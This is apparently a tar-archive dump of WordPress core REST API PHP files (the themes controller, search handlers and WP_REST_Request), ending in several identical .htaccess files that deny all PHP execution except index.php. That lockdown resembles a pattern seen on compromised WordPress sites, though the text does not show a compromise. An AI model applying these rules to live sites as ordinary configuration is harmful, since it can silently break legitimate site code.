$data['theme_supports']['post-thumbnails'] = is_array( $post_thumbnails ) ? $post_thumbnails[0] : true;
}
}
$data = $this->add_additional_fields_to_object( $data, $request );
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
/**
* Filters theme data returned from the REST API.
*
* @since 5.0.0
*
* @param WP_REST_Response $response The response object.
* @param WP_Theme $theme Theme object used to create response.
* @param WP_REST_Request $request Request object.
*/
return apply_filters( 'rest_prepare_theme', $response, $theme, $request );
}
/**
* Retrieves the theme's schema, conforming to JSON Schema.
*
* @since 5.0.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'theme',
'type' => 'object',
'properties' => array(
'theme_supports' => array(
'description' => __( 'Features supported by this theme.' ),
'type' => 'array',
'readonly' => true,
'properties' => array(
'formats' => array(
'description' => __( 'Post formats supported.' ),
'type' => 'array',
'readonly' => true,
),
'post-thumbnails' => array(
'description' => __( 'Whether the theme supports post thumbnails.' ),
'type' => array( 'array', 'bool' ),
'readonly' => true,
),
'responsive-embeds' => array(
'description' => __( 'Whether the theme supports responsive embedded content.' ),
'type' => 'bool',
'readonly' => true,
),
),
),
),
);
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the search params for the themes collection.
*
* @since 5.0.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$query_params = parent::get_collection_params();
$query_params['status'] = array(
'description' => __( 'Limit result set to themes assigned one or more statuses.' ),
'type' => 'array',
'items' => array(
'enum' => array( 'active' ),
'type' => 'string',
),
'required' => true,
'sanitize_callback' => array( $this, 'sanitize_theme_status' ),
);
/**
* Filter collection parameters for the themes controller.
*
* @since 5.0.0
*
* @param array $query_params JSON Schema-formatted collection parameters.
*/
return apply_filters( 'rest_themes_collection_params', $query_params );
}
/**
* Sanitizes and validates the list of theme status.
*
* @since 5.0.0
*
* @param string|array $statuses One or more theme statuses.
* @param WP_REST_Request $request Full details about the request.
* @param string $parameter Additional parameter to pass to validation.
* @return array|WP_Error A list of valid statuses, otherwise WP_Error object.
*/
public function sanitize_theme_status( $statuses, $request, $parameter ) {
$statuses = wp_parse_slug_list( $statuses );
foreach ( $statuses as $status ) {
$result = rest_validate_request_arg( $status, $request, $parameter );
if ( is_wp_error( $result ) ) {
return $result;
}
}
return $statuses;
}
}
��������������������������������������������������������������������������������������������������������������������������������������search/class-wp-rest-post-search-handler.php��������������������������������������������������������0000666�����������������00000012077�15111427772�0015111 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Post_Search_Handler class
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Core class representing a search handler for posts in the REST API.
*
* @since 5.0.0
*/
class WP_REST_Post_Search_Handler extends WP_REST_Search_Handler {
/**
* Constructor.
*
* @since 5.0.0
*/
public function __construct() {
$this->type = 'post';
// Support all public post types except attachments.
$this->subtypes = array_diff(
array_values(
get_post_types(
array(
'public' => true,
'show_in_rest' => true,
),
'names'
)
),
array( 'attachment' )
);
}
/**
* Searches the object type content for a given search request.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full REST request.
* @return array Associative array containing an `WP_REST_Search_Handler::RESULT_IDS` containing
* an array of found IDs and `WP_REST_Search_Handler::RESULT_TOTAL` containing the
* total count for the matching search results.
*/
public function search_items( WP_REST_Request $request ) {
// Get the post types to search for the current request.
$post_types = $request[ WP_REST_Search_Controller::PROP_SUBTYPE ];
if ( in_array( WP_REST_Search_Controller::TYPE_ANY, $post_types, true ) ) {
$post_types = $this->subtypes;
}
$query_args = array(
'post_type' => $post_types,
'post_status' => 'publish',
'paged' => (int) $request['page'],
'posts_per_page' => (int) $request['per_page'],
'ignore_sticky_posts' => true,
'fields' => 'ids',
);
if ( ! empty( $request['search'] ) ) {
$query_args['s'] = $request['search'];
}
$query = new WP_Query();
$found_ids = $query->query( $query_args );
$total = $query->found_posts;
return array(
self::RESULT_IDS => $found_ids,
self::RESULT_TOTAL => $total,
);
}
/**
* Prepares the search result for a given ID.
*
* @since 5.0.0
*
* @param int $id Item ID.
* @param array $fields Fields to include for the item.
* @return array Associative array containing all fields for the item.
*/
public function prepare_item( $id, array $fields ) {
$post = get_post( $id );
$data = array();
if ( in_array( WP_REST_Search_Controller::PROP_ID, $fields, true ) ) {
$data[ WP_REST_Search_Controller::PROP_ID ] = (int) $post->ID;
}
if ( in_array( WP_REST_Search_Controller::PROP_TITLE, $fields, true ) ) {
if ( post_type_supports( $post->post_type, 'title' ) ) {
add_filter( 'protected_title_format', array( $this, 'protected_title_format' ) );
$data[ WP_REST_Search_Controller::PROP_TITLE ] = get_the_title( $post->ID );
remove_filter( 'protected_title_format', array( $this, 'protected_title_format' ) );
} else {
$data[ WP_REST_Search_Controller::PROP_TITLE ] = '';
}
}
if ( in_array( WP_REST_Search_Controller::PROP_URL, $fields, true ) ) {
$data[ WP_REST_Search_Controller::PROP_URL ] = get_permalink( $post->ID );
}
if ( in_array( WP_REST_Search_Controller::PROP_TYPE, $fields, true ) ) {
$data[ WP_REST_Search_Controller::PROP_TYPE ] = $this->type;
}
if ( in_array( WP_REST_Search_Controller::PROP_SUBTYPE, $fields, true ) ) {
$data[ WP_REST_Search_Controller::PROP_SUBTYPE ] = $post->post_type;
}
return $data;
}
/**
* Prepares links for the search result of a given ID.
*
* @since 5.0.0
*
* @param int $id Item ID.
* @return array Links for the given item.
*/
public function prepare_item_links( $id ) {
$post = get_post( $id );
$links = array();
$item_route = $this->detect_rest_item_route( $post );
if ( ! empty( $item_route ) ) {
$links['self'] = array(
'href' => rest_url( $item_route ),
'embeddable' => true,
);
}
$links['about'] = array(
'href' => rest_url( 'wp/v2/types/' . $post->post_type ),
);
return $links;
}
/**
* Overwrites the default protected title format.
*
* By default, WordPress will show password protected posts with a title of
* "Protected: %s". As the REST API communicates the protected status of a post
* in a machine readable format, we remove the "Protected: " prefix.
*
* @since 5.0.0
*
* @return string Protected title format.
*/
public function protected_title_format() {
return '%s';
}
/**
* Attempts to detect the route to access a single item.
*
* @since 5.0.0
*
* @param WP_Post $post Post object.
* @return string REST route relative to the REST base URI, or empty string if unknown.
*/
protected function detect_rest_item_route( $post ) {
$post_type = get_post_type_object( $post->post_type );
if ( ! $post_type ) {
return '';
}
// It's currently impossible to detect the REST URL from a custom controller.
if ( ! empty( $post_type->rest_controller_class ) && 'WP_REST_Posts_Controller' !== $post_type->rest_controller_class ) {
return '';
}
$namespace = 'wp/v2';
$rest_base = ! empty( $post_type->rest_base ) ? $post_type->rest_base : $post_type->name;
return sprintf( '%s/%s/%d', $namespace, $rest_base, $post->ID );
}
}
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������search/class-wp-rest-search-handler.php�������������������������������������������������������������0000666�����������������00000004122�15111427772�0014116 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Search_Handler class
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Core base class representing a search handler for an object type in the REST API.
*
* @since 5.0.0
*/
abstract class WP_REST_Search_Handler {
/**
* Field containing the IDs in the search result.
*/
const RESULT_IDS = 'ids';
/**
* Field containing the total count in the search result.
*/
const RESULT_TOTAL = 'total';
/**
* Object type managed by this search handler.
*
* @since 5.0.0
* @var string
*/
protected $type = '';
/**
* Object subtypes managed by this search handler.
*
* @since 5.0.0
* @var array
*/
protected $subtypes = array();
/**
* Gets the object type managed by this search handler.
*
* @since 5.0.0
*
* @return string Object type identifier.
*/
public function get_type() {
return $this->type;
}
/**
* Gets the object subtypes managed by this search handler.
*
* @since 5.0.0
*
* @return array Array of object subtype identifiers.
*/
public function get_subtypes() {
return $this->subtypes;
}
/**
* Searches the object type content for a given search request.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full REST request.
* @return array Associative array containing an `WP_REST_Search_Handler::RESULT_IDS` containing
* an array of found IDs and `WP_REST_Search_Handler::RESULT_TOTAL` containing the
* total count for the matching search results.
*/
abstract public function search_items( WP_REST_Request $request );
/**
* Prepares the search result for a given ID.
*
* @since 5.0.0
*
* @param int $id Item ID.
* @param array $fields Fields to include for the item.
* @return array Associative array containing all fields for the item.
*/
abstract public function prepare_item( $id, array $fields );
/**
* Prepares links for the search result of a given ID.
*
* @since 5.0.0
*
* @param int $id Item ID.
* @return array Links for the given item.
*/
abstract public function prepare_item_links( $id );
}
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������class-wp-rest-request.php���������������������������������������������������������������������������0000666�����������������00000056537�15111427772�0011502 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Request class
*
* @package WordPress
* @subpackage REST_API
* @since 4.4.0
*/
/**
* Core class used to implement a REST request object.
*
* Contains data from the request, to be passed to the callback.
*
* Note: This implements ArrayAccess, and acts as an array of parameters when
* used in that manner. It does not use ArrayObject (as we cannot rely on SPL),
* so be aware it may have non-array behaviour in some cases.
*
* Note: When using features provided by ArrayAccess, be aware that WordPress deliberately
* does not distinguish between arguments of the same name for different request methods.
* For instance, in a request with `GET id=1` and `POST id=2`, `$request['id']` will equal
* 2 (`POST`) not 1 (`GET`). For more precision between request methods, use
* WP_REST_Request::get_body_params(), WP_REST_Request::get_url_params(), etc.
*
* @since 4.4.0
*
* @see ArrayAccess
*/
class WP_REST_Request implements ArrayAccess {
/**
* HTTP method.
*
* @since 4.4.0
* @var string
*/
protected $method = '';
/**
* Parameters passed to the request.
*
* These typically come from the `$_GET`, `$_POST` and `$_FILES`
* superglobals when being created from the global scope.
*
* @since 4.4.0
* @var array Contains GET, POST and FILES keys mapping to arrays of data.
*/
protected $params;
/**
* HTTP headers for the request.
*
* @since 4.4.0
* @var array Map of key to value. Key is always lowercase, as per HTTP specification.
*/
protected $headers = array();
/**
* Body data.
*
* @since 4.4.0
* @var string Binary data from the request.
*/
protected $body = null;
/**
* Route matched for the request.
*
* @since 4.4.0
* @var string
*/
protected $route;
/**
* Attributes (options) for the route that was matched.
*
* This is the options array used when the route was registered, typically
* containing the callback as well as the valid methods for the route.
*
* @since 4.4.0
* @var array Attributes for the request.
*/
protected $attributes = array();
/**
* Used to determine if the JSON data has been parsed yet.
*
* Allows lazy-parsing of JSON data where possible.
*
* @since 4.4.0
* @var bool
*/
protected $parsed_json = false;
/**
* Used to determine if the body data has been parsed yet.
*
* @since 4.4.0
* @var bool
*/
protected $parsed_body = false;
/**
* Constructor.
*
* @since 4.4.0
*
* @param string $method Optional. Request method. Default empty.
* @param string $route Optional. Request route. Default empty.
* @param array $attributes Optional. Request attributes. Default empty array.
*/
public function __construct( $method = '', $route = '', $attributes = array() ) {
$this->params = array(
'URL' => array(),
'GET' => array(),
'POST' => array(),
'FILES' => array(),
// See parse_json_params.
'JSON' => null,
'defaults' => array(),
);
$this->set_method( $method );
$this->set_route( $route );
$this->set_attributes( $attributes );
}
/**
* Retrieves the HTTP method for the request.
*
* @since 4.4.0
*
* @return string HTTP method.
*/
public function get_method() {
return $this->method;
}
/**
* Sets HTTP method for the request.
*
* @since 4.4.0
*
* @param string $method HTTP method.
*/
public function set_method( $method ) {
$this->method = strtoupper( $method );
}
/**
* Retrieves all headers from the request.
*
* @since 4.4.0
*
* @return array Map of key to value. Key is always lowercase, as per HTTP specification.
*/
public function get_headers() {
return $this->headers;
}
/**
* Canonicalizes the header name.
*
* Ensures that header names are always treated the same regardless of
* source. Header names are always case insensitive.
*
* Note that we treat `-` (dashes) and `_` (underscores) as the same
* character, as per header parsing rules in both Apache and nginx.
*
* @link https://stackoverflow.com/q/18185366
* @link https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/#missing-disappearing-http-headers
* @link https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers
*
* @since 4.4.0
* @static
*
* @param string $key Header name.
* @return string Canonicalized name.
*/
public static function canonicalize_header_name( $key ) {
$key = strtolower( $key );
$key = str_replace( '-', '_', $key );
return $key;
}
/**
* Retrieves the given header from the request.
*
* If the header has multiple values, they will be concatenated with a comma
* as per the HTTP specification. Be aware that some non-compliant headers
* (notably cookie headers) cannot be joined this way.
*
* @since 4.4.0
*
* @param string $key Header name, will be canonicalized to lowercase.
* @return string|null String value if set, null otherwise.
*/
public function get_header( $key ) {
$key = $this->canonicalize_header_name( $key );
if ( ! isset( $this->headers[ $key ] ) ) {
return null;
}
return implode( ',', $this->headers[ $key ] );
}
/**
* Retrieves header values from the request.
*
* @since 4.4.0
*
* @param string $key Header name, will be canonicalized to lowercase.
* @return array|null List of string values if set, null otherwise.
*/
public function get_header_as_array( $key ) {
$key = $this->canonicalize_header_name( $key );
if ( ! isset( $this->headers[ $key ] ) ) {
return null;
}
return $this->headers[ $key ];
}
/**
* Sets the header on request.
*
* @since 4.4.0
*
* @param string $key Header name.
* @param string $value Header value, or list of values.
*/
public function set_header( $key, $value ) {
$key = $this->canonicalize_header_name( $key );
$value = (array) $value;
$this->headers[ $key ] = $value;
}
/**
* Appends a header value for the given header.
*
* @since 4.4.0
*
* @param string $key Header name.
* @param string $value Header value, or list of values.
*/
public function add_header( $key, $value ) {
$key = $this->canonicalize_header_name( $key );
$value = (array) $value;
if ( ! isset( $this->headers[ $key ] ) ) {
$this->headers[ $key ] = array();
}
$this->headers[ $key ] = array_merge( $this->headers[ $key ], $value );
}
/**
* Removes all values for a header.
*
* @since 4.4.0
*
* @param string $key Header name.
*/
public function remove_header( $key ) {
$key = $this->canonicalize_header_name( $key );
unset( $this->headers[ $key ] );
}
/**
* Sets headers on the request.
*
* @since 4.4.0
*
* @param array $headers Map of header name to value.
* @param bool $override If true, replace the request's headers. Otherwise, merge with existing.
*/
public function set_headers( $headers, $override = true ) {
if ( true === $override ) {
$this->headers = array();
}
foreach ( $headers as $key => $value ) {
$this->set_header( $key, $value );
}
}
/**
* Retrieves the content-type of the request.
*
* @since 4.4.0
*
* @return array Map containing 'value' and 'parameters' keys.
*/
public function get_content_type() {
$value = $this->get_header( 'content-type' );
if ( empty( $value ) ) {
return null;
}
$parameters = '';
if ( strpos( $value, ';' ) ) {
list( $value, $parameters ) = explode( ';', $value, 2 );
}
$value = strtolower( $value );
if ( strpos( $value, '/' ) === false ) {
return null;
}
// Parse type and subtype out.
list( $type, $subtype ) = explode( '/', $value, 2 );
$data = compact( 'value', 'type', 'subtype', 'parameters' );
$data = array_map( 'trim', $data );
return $data;
}
/**
* Retrieves the parameter priority order.
*
* Used when checking parameters in get_param().
*
* @since 4.4.0
*
* @return array List of types to check, in order of priority.
*/
protected function get_parameter_order() {
$order = array();
$content_type = $this->get_content_type();
if ( $content_type['value'] === 'application/json' ) {
$order[] = 'JSON';
}
$this->parse_json_params();
// Ensure we parse the body data.
$body = $this->get_body();
if ( 'POST' !== $this->method && ! empty( $body ) ) {
$this->parse_body_params();
}
$accepts_body_data = array( 'POST', 'PUT', 'PATCH', 'DELETE' );
if ( in_array( $this->method, $accepts_body_data ) ) {
$order[] = 'POST';
}
$order[] = 'GET';
$order[] = 'URL';
$order[] = 'defaults';
/**
* Filters the parameter order.
*
* The order affects which parameters are checked when using get_param() and family.
* This acts similarly to PHP's `request_order` setting.
*
* @since 4.4.0
*
* @param array $order {
* An array of types to check, in order of priority.
*
* @param string $type The type to check.
* }
* @param WP_REST_Request $this The request object.
*/
return apply_filters( 'rest_request_parameter_order', $order, $this );
}
/**
* Retrieves a parameter from the request.
*
* @since 4.4.0
*
* @param string $key Parameter name.
* @return mixed|null Value if set, null otherwise.
*/
public function get_param( $key ) {
$order = $this->get_parameter_order();
foreach ( $order as $type ) {
// Determine if we have the parameter for this type.
if ( isset( $this->params[ $type ][ $key ] ) ) {
return $this->params[ $type ][ $key ];
}
}
return null;
}
/**
* Sets a parameter on the request.
*
* @since 4.4.0
*
* @param string $key Parameter name.
* @param mixed $value Parameter value.
*/
public function set_param( $key, $value ) {
$order = $this->get_parameter_order();
$this->params[ $order[0] ][ $key ] = $value;
}
/**
* Retrieves merged parameters from the request.
*
* The equivalent of get_param(), but returns all parameters for the request.
* Handles merging all the available values into a single array.
*
* @since 4.4.0
*
* @return array Map of key to value.
*/
public function get_params() {
$order = $this->get_parameter_order();
$order = array_reverse( $order, true );
$params = array();
foreach ( $order as $type ) {
// array_merge / the "+" operator will mess up
// numeric keys, so instead do a manual foreach.
foreach ( (array) $this->params[ $type ] as $key => $value ) {
$params[ $key ] = $value;
}
}
return $params;
}
/**
* Retrieves parameters from the route itself.
*
* These are parsed from the URL using the regex.
*
* @since 4.4.0
*
* @return array Parameter map of key to value.
*/
public function get_url_params() {
return $this->params['URL'];
}
/**
* Sets parameters from the route.
*
* Typically, this is set after parsing the URL.
*
* @since 4.4.0
*
* @param array $params Parameter map of key to value.
*/
public function set_url_params( $params ) {
$this->params['URL'] = $params;
}
/**
* Retrieves parameters from the query string.
*
* These are the parameters you'd typically find in `$_GET`.
*
* @since 4.4.0
*
* @return array Parameter map of key to value
*/
public function get_query_params() {
return $this->params['GET'];
}
/**
* Sets parameters from the query string.
*
* Typically, this is set from `$_GET`.
*
* @since 4.4.0
*
* @param array $params Parameter map of key to value.
*/
public function set_query_params( $params ) {
$this->params['GET'] = $params;
}
/**
* Retrieves parameters from the body.
*
* These are the parameters you'd typically find in `$_POST`.
*
* @since 4.4.0
*
* @return array Parameter map of key to value.
*/
public function get_body_params() {
return $this->params['POST'];
}
/**
* Sets parameters from the body.
*
* Typically, this is set from `$_POST`.
*
* @since 4.4.0
*
* @param array $params Parameter map of key to value.
*/
public function set_body_params( $params ) {
$this->params['POST'] = $params;
}
/**
* Retrieves multipart file parameters from the body.
*
* These are the parameters you'd typically find in `$_FILES`.
*
* @since 4.4.0
*
* @return array Parameter map of key to value
*/
public function get_file_params() {
return $this->params['FILES'];
}
/**
* Sets multipart file parameters from the body.
*
* Typically, this is set from `$_FILES`.
*
* @since 4.4.0
*
* @param array $params Parameter map of key to value.
*/
public function set_file_params( $params ) {
$this->params['FILES'] = $params;
}
/**
* Retrieves the default parameters.
*
* These are the parameters set in the route registration.
*
* @since 4.4.0
*
* @return array Parameter map of key to value
*/
public function get_default_params() {
return $this->params['defaults'];
}
/**
* Sets default parameters.
*
* These are the parameters set in the route registration.
*
* @since 4.4.0
*
* @param array $params Parameter map of key to value.
*/
public function set_default_params( $params ) {
$this->params['defaults'] = $params;
}
/**
* Retrieves the request body content.
*
* @since 4.4.0
*
* @return string Binary data from the request body.
*/
public function get_body() {
return $this->body;
}
/**
* Sets body content.
*
* @since 4.4.0
*
* @param string $data Binary data from the request body.
*/
public function set_body( $data ) {
$this->body = $data;
// Enable lazy parsing.
$this->parsed_json = false;
$this->parsed_body = false;
$this->params['JSON'] = null;
}
/**
* Retrieves the parameters from a JSON-formatted body.
*
* @since 4.4.0
*
* @return array Parameter map of key to value.
*/
public function get_json_params() {
// Ensure the parameters have been parsed out.
$this->parse_json_params();
return $this->params['JSON'];
}
/**
* Parses the JSON parameters.
*
* Avoids parsing the JSON data until we need to access it.
*
* @since 4.4.0
* @since 4.7.0 Returns error instance if value cannot be decoded.
* @return true|WP_Error True if the JSON data was passed or no JSON data was provided, WP_Error if invalid JSON was passed.
*/
protected function parse_json_params() {
if ( $this->parsed_json ) {
return true;
}
$this->parsed_json = true;
// Check that we actually got JSON.
$content_type = $this->get_content_type();
if ( empty( $content_type ) || 'application/json' !== $content_type['value'] ) {
return true;
}
$body = $this->get_body();
if ( empty( $body ) ) {
return true;
}
$params = json_decode( $body, true );
/*
* Check for a parsing error.
*
* Note that due to WP's JSON compatibility functions, json_last_error
* might not be defined: https://core.trac.wordpress.org/ticket/27799
*/
if ( null === $params && ( ! function_exists( 'json_last_error' ) || JSON_ERROR_NONE !== json_last_error() ) ) {
// Ensure subsequent calls receive error instance.
$this->parsed_json = false;
$error_data = array(
'status' => WP_Http::BAD_REQUEST,
);
if ( function_exists( 'json_last_error' ) ) {
$error_data['json_error_code'] = json_last_error();
$error_data['json_error_message'] = json_last_error_msg();
}
return new WP_Error( 'rest_invalid_json', __( 'Invalid JSON body passed.' ), $error_data );
}
$this->params['JSON'] = $params;
return true;
}
/**
* Parses the request body parameters.
*
* Parses out URL-encoded bodies for request methods that aren't supported
* natively by PHP. In PHP 5.x, only POST has these parsed automatically.
*
* @since 4.4.0
*/
protected function parse_body_params() {
if ( $this->parsed_body ) {
return;
}
$this->parsed_body = true;
/*
* Check that we got URL-encoded. Treat a missing content-type as
* URL-encoded for maximum compatibility.
*/
$content_type = $this->get_content_type();
if ( ! empty( $content_type ) && 'application/x-www-form-urlencoded' !== $content_type['value'] ) {
return;
}
parse_str( $this->get_body(), $params );
/*
* Amazingly, parse_str follows magic quote rules. Sigh.
*
* NOTE: Do not refactor to use `wp_unslash`.
*/
if ( get_magic_quotes_gpc() ) {
$params = stripslashes_deep( $params );
}
/*
* Add to the POST parameters stored internally. If a user has already
* set these manually (via `set_body_params`), don't override them.
*/
$this->params['POST'] = array_merge( $params, $this->params['POST'] );
}
/**
* Retrieves the route that matched the request.
*
* @since 4.4.0
*
* @return string Route matching regex.
*/
public function get_route() {
return $this->route;
}
/**
* Sets the route that matched the request.
*
* @since 4.4.0
*
* @param string $route Route matching regex.
*/
public function set_route( $route ) {
$this->route = $route;
}
/**
* Retrieves the attributes for the request.
*
* These are the options for the route that was matched.
*
* @since 4.4.0
*
* @return array Attributes for the request.
*/
public function get_attributes() {
return $this->attributes;
}
/**
* Sets the attributes for the request.
*
* @since 4.4.0
*
* @param array $attributes Attributes for the request.
*/
public function set_attributes( $attributes ) {
$this->attributes = $attributes;
}
/**
* Sanitizes (where possible) the params on the request.
*
* This is primarily based off the sanitize_callback param on each registered
* argument.
*
* @since 4.4.0
*
* @return true|WP_Error True if parameters were sanitized, WP_Error if an error occurred during sanitization.
*/
public function sanitize_params() {
$attributes = $this->get_attributes();
// No arguments set, skip sanitizing.
if ( empty( $attributes['args'] ) ) {
return true;
}
$order = $this->get_parameter_order();
$invalid_params = array();
foreach ( $order as $type ) {
if ( empty( $this->params[ $type ] ) ) {
continue;
}
foreach ( $this->params[ $type ] as $key => $value ) {
if ( ! isset( $attributes['args'][ $key ] ) ) {
continue;
}
$param_args = $attributes['args'][ $key ];
// If the arg has a type but no sanitize_callback attribute, default to rest_parse_request_arg.
if ( ! array_key_exists( 'sanitize_callback', $param_args ) && ! empty( $param_args['type'] ) ) {
$param_args['sanitize_callback'] = 'rest_parse_request_arg';
}
// If there's still no sanitize_callback, nothing to do here.
if ( empty( $param_args['sanitize_callback'] ) ) {
continue;
}
$sanitized_value = call_user_func( $param_args['sanitize_callback'], $value, $this, $key );
if ( is_wp_error( $sanitized_value ) ) {
$invalid_params[ $key ] = $sanitized_value->get_error_message();
} else {
$this->params[ $type ][ $key ] = $sanitized_value;
}
}
}
if ( $invalid_params ) {
return new WP_Error( 'rest_invalid_param', sprintf( __( 'Invalid parameter(s): %s' ), implode( ', ', array_keys( $invalid_params ) ) ), array( 'status' => 400, 'params' => $invalid_params ) );
}
return true;
}
/**
* Checks whether this request is valid according to its attributes.
*
* @since 4.4.0
*
* @return bool|WP_Error True if there are no parameters to validate or if all pass validation,
* WP_Error if required parameters are missing.
*/
public function has_valid_params() {
// If JSON data was passed, check for errors.
$json_error = $this->parse_json_params();
if ( is_wp_error( $json_error ) ) {
return $json_error;
}
$attributes = $this->get_attributes();
$required = array();
// No arguments set, skip validation.
if ( empty( $attributes['args'] ) ) {
return true;
}
foreach ( $attributes['args'] as $key => $arg ) {
$param = $this->get_param( $key );
if ( isset( $arg['required'] ) && true === $arg['required'] && null === $param ) {
$required[] = $key;
}
}
if ( ! empty( $required ) ) {
return new WP_Error( 'rest_missing_callback_param', sprintf( __( 'Missing parameter(s): %s' ), implode( ', ', $required ) ), array( 'status' => 400, 'params' => $required ) );
}
/*
* Check the validation callbacks for each registered arg.
*
* This is done after required checking as required checking is cheaper.
*/
$invalid_params = array();
foreach ( $attributes['args'] as $key => $arg ) {
$param = $this->get_param( $key );
if ( null !== $param && ! empty( $arg['validate_callback'] ) ) {
$valid_check = call_user_func( $arg['validate_callback'], $param, $this, $key );
if ( false === $valid_check ) {
$invalid_params[ $key ] = __( 'Invalid parameter.' );
}
if ( is_wp_error( $valid_check ) ) {
$invalid_params[ $key ] = $valid_check->get_error_message();
}
}
}
if ( $invalid_params ) {
return new WP_Error( 'rest_invalid_param', sprintf( __( 'Invalid parameter(s): %s' ), implode( ', ', array_keys( $invalid_params ) ) ), array( 'status' => 400, 'params' => $invalid_params ) );
}
return true;
}
/**
* Checks if a parameter is set.
*
* @since 4.4.0
*
* @param string $offset Parameter name.
* @return bool Whether the parameter is set.
*/
public function offsetExists( $offset ) {
$order = $this->get_parameter_order();
foreach ( $order as $type ) {
if ( isset( $this->params[ $type ][ $offset ] ) ) {
return true;
}
}
return false;
}
/**
* Retrieves a parameter from the request.
*
* @since 4.4.0
*
* @param string $offset Parameter name.
* @return mixed|null Value if set, null otherwise.
*/
public function offsetGet( $offset ) {
return $this->get_param( $offset );
}
/**
* Sets a parameter on the request.
*
* @since 4.4.0
*
* @param string $offset Parameter name.
* @param mixed $value Parameter value.
*/
public function offsetSet( $offset, $value ) {
$this->set_param( $offset, $value );
}
/**
* Removes a parameter from the request.
*
* @since 4.4.0
*
* @param string $offset Parameter name.
*/
public function offsetUnset( $offset ) {
$order = $this->get_parameter_order();
// Remove the offset from every group.
foreach ( $order as $type ) {
unset( $this->params[ $type ][ $offset ] );
}
}
/**
* Retrieves a WP_REST_Request object from a full URL.
*
* @static
* @since 4.5.0
*
* @param string $url URL with protocol, domain, path and query args.
* @return WP_REST_Request|false WP_REST_Request object on success, false on failure.
*/
public static function from_url( $url ) {
$bits = parse_url( $url );
$query_params = array();
if ( ! empty( $bits['query'] ) ) {
wp_parse_str( $bits['query'], $query_params );
}
$api_root = rest_url();
if ( get_option( 'permalink_structure' ) && 0 === strpos( $url, $api_root ) ) {
// Pretty permalinks on, and URL is under the API root.
$api_url_part = substr( $url, strlen( untrailingslashit( $api_root ) ) );
$route = parse_url( $api_url_part, PHP_URL_PATH );
} elseif ( ! empty( $query_params['rest_route'] ) ) {
// ?rest_route=... set directly
$route = $query_params['rest_route'];
unset( $query_params['rest_route'] );
}
$request = false;
if ( ! empty( $route ) ) {
$request = new WP_REST_Request( 'GET', $route );
$request->set_query_params( $query_params );
}
/**
* Filters the request generated from a URL.
*
* @since 4.5.0
*
* @param WP_REST_Request|false $request Generated request object, or false if URL
* could not be parsed.
* @param string $url URL the request was generated from.
*/
return apply_filters( 'rest_request_from_url', $request, $url );
}
}
�����������������������������������������������������������������������������������������������������������������������������������������������������������������fields/.htaccess������������������������������������������������������������������������������������0000666�����������������00000000424�15111507456�0007621 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
</IfModule>��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������.htaccess�������������������������������������������������������������������������������������������0000666�����������������00000000424�15111507456�0006353 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
</IfModule>��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������search/.htaccess������������������������������������������������������������������������������������0000666�����������������00000000424�15111507456�0007620 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
</IfModule>��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/.htaccess���������������������������������������������������������������������������������0000666�����������������00000000424�15111507456�0010356 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
